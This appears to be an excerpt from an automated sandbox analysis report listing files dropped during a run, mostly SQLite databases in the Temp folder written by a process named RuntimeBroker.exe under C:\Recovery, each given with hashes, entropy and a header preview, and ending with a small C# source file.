                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\imCKtO89av

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):40960
                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\jUvhx71Sb8

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):40960
                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\jgTkky5bEi

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\jsu5DWR8Tf

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.5707520969659783
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                            MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                            SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                            SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                            SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\kCqWZxLUtd

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):106496
                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\kiuQoRAynV

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\lTLd0ET4Bv

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):106496
                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\mNex1m48li

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):49152
                                                                                                            Entropy (8bit):0.8180424350137764
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                            MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                            SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                            SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                            SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\mQEClzNYHs

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\mRBMSkE0qB

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):49152
                                                                                                            Entropy (8bit):0.8180424350137764
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                            MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                            SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                            SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                            SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\mg5QVCeM7H

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\mhPLUfh8uy

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):106496
                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\mpojuWpOpU

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\mpxD1ADmWr

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):40960
                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\n0qSsfxs59

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):40960
                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\nPcIazauhv

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):49152
                                                                                                            Entropy (8bit):0.8180424350137764
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                            MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                            SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                            SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                            SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\nhUVWLiLPL

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):106496
                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\ntNjWhMxD7

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):40960
                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\nyjURLBGAE

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):40960
                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\o5OsbWHzyw

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):40960
                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\oGoPAPtbfC

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.5707520969659783
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                            MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                            SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                            SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                            SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\ojRCkPT4rw

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.5712781801655107
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                            MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                            SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                            SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                            SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\ozb03vs1\ozb03vs1.0.cs

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\s5duotgoYD.exe
                                                                                                            File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                                                            Category:dropped
                                                                                                            Size (bytes):376
